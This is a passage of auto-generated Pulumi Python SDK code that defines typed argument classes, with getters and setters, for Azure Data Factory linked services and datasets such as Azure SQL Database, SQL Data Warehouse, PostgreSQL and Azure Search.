:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'AzurePostgreSql')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if connection_string is not None:
pulumi.set(__self__, "connection_string", connection_string)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Optional[Any]:
"""
An ODBC connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Optional[Any]):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzurePostgreSqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Azure PostgreSQL dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzurePostgreSqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSearchIndexDatasetArgs:
def __init__(__self__, *,
index_name: Any,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure Search Index.
:param Any index_name: The name of the Azure Search Index. Type: string (or Expression with resultType string).
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "index_name", index_name)
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'AzureSearchIndex')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="indexName")
def index_name(self) -> Any:
"""
The name of the Azure Search Index. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "index_name")
@index_name.setter
def index_name(self, value: Any):
pulumi.set(self, "index_name", value)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSearchLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
url: Any,
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None):
"""
Linked service for Windows Azure Search Service.
:param pulumi.Input[str] type: Type of linked service.
:param Any url: URL for Azure Search service. Type: string (or Expression with resultType string).
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] key: Admin Key for Azure Search service.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
"""
pulumi.set(__self__, "type", 'AzureSearch')
pulumi.set(__self__, "url", url)
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if key is not None:
pulumi.set(__self__, "key", key)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def url(self) -> Any:
"""
URL for Azure Search service. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "url")
@url.setter
def url(self, value: Any):
pulumi.set(self, "url", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
Admin Key for Azure Search service.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@pulumi.input_type
class AzureSqlDWLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None):
"""
Azure SQL Data Warehouse linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against Azure SQL Data Warehouse.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureSqlDW')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against Azure SQL Data Warehouse.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureSqlDWTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure SQL Data Warehouse dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureSqlDWTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure SQL Data Warehouse. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureSqlDatabaseLinkedServiceArgs:
def __init__(__self__, *,
connection_string: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
connect_via: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']] = None,
description: Optional[pulumi.Input[str]] = None,
encrypted_credential: Optional[Any] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
service_principal_id: Optional[Any] = None,
service_principal_key: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]] = None,
tenant: Optional[Any] = None):
"""
Microsoft Azure SQL Database linked service.
:param Any connection_string: The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
:param pulumi.Input[str] type: Type of linked service.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the linked service.
:param pulumi.Input['IntegrationRuntimeReferenceArgs'] connect_via: The integration runtime reference.
:param pulumi.Input[str] description: Linked service description.
:param Any encrypted_credential: The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for linked service.
:param Any service_principal_id: The ID of the service principal used to authenticate against Azure SQL Database. Type: string (or Expression with resultType string).
:param pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']] service_principal_key: The key of the service principal used to authenticate against Azure SQL Database.
:param Any tenant: The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
pulumi.set(__self__, "connection_string", connection_string)
pulumi.set(__self__, "type", 'AzureSqlDatabase')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if connect_via is not None:
pulumi.set(__self__, "connect_via", connect_via)
if description is not None:
pulumi.set(__self__, "description", description)
if encrypted_credential is not None:
pulumi.set(__self__, "encrypted_credential", encrypted_credential)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if service_principal_id is not None:
pulumi.set(__self__, "service_principal_id", service_principal_id)
if service_principal_key is not None:
pulumi.set(__self__, "service_principal_key", service_principal_key)
if tenant is not None:
pulumi.set(__self__, "tenant", tenant)
@property
@pulumi.getter(name="connectionString")
def connection_string(self) -> Any:
"""
The connection string. Type: string, SecureString or AzureKeyVaultSecretReference.
"""
return pulumi.get(self, "connection_string")
@connection_string.setter
def connection_string(self, value: Any):
pulumi.set(self, "connection_string", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of linked service.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the linked service.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter(name="connectVia")
def connect_via(self) -> Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]:
"""
The integration runtime reference.
"""
return pulumi.get(self, "connect_via")
@connect_via.setter
def connect_via(self, value: Optional[pulumi.Input['IntegrationRuntimeReferenceArgs']]):
pulumi.set(self, "connect_via", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Linked service description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="encryptedCredential")
def encrypted_credential(self) -> Optional[Any]:
"""
The encrypted credential used for authentication. Credentials are encrypted using the integration runtime credential manager. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "encrypted_credential")
@encrypted_credential.setter
def encrypted_credential(self, value: Optional[Any]):
pulumi.set(self, "encrypted_credential", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for linked service.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="servicePrincipalId")
def service_principal_id(self) -> Optional[Any]:
"""
The ID of the service principal used to authenticate against Azure SQL Database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "service_principal_id")
@service_principal_id.setter
def service_principal_id(self, value: Optional[Any]):
pulumi.set(self, "service_principal_id", value)
@property
@pulumi.getter(name="servicePrincipalKey")
def service_principal_key(self) -> Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]:
"""
The key of the service principal used to authenticate against Azure SQL Database.
"""
return pulumi.get(self, "service_principal_key")
@service_principal_key.setter
def service_principal_key(self, value: Optional[pulumi.Input[Union['AzureKeyVaultSecretReferenceArgs', 'SecureStringArgs']]]):
pulumi.set(self, "service_principal_key", value)
@property
@pulumi.getter
def tenant(self) -> Optional[Any]:
"""
The name or ID of the tenant to which the service principal belongs. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "tenant")
@tenant.setter
def tenant(self, value: Optional[Any]):
pulumi.set(self, "tenant", value)
@pulumi.input_type
class AzureSqlTableDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
table_name: Any,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
The Azure SQL Server database dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param Any table_name: The table name of the Azure SQL database. Type: string (or Expression with resultType string).
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "table_name", table_name)
pulumi.set(__self__, "type", 'AzureSqlTable')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter(name="tableName")
def table_name(self) -> Any:
"""
The table name of the Azure SQL database. Type: string (or Expression with resultType string).
"""
return pulumi.get(self, "table_name")
@table_name.setter
def table_name(self, value: Any):
pulumi.set(self, "table_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
@pulumi.input_type
class AzureStorageLinkedServiceArgs:
def __init__(__self__, *,
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
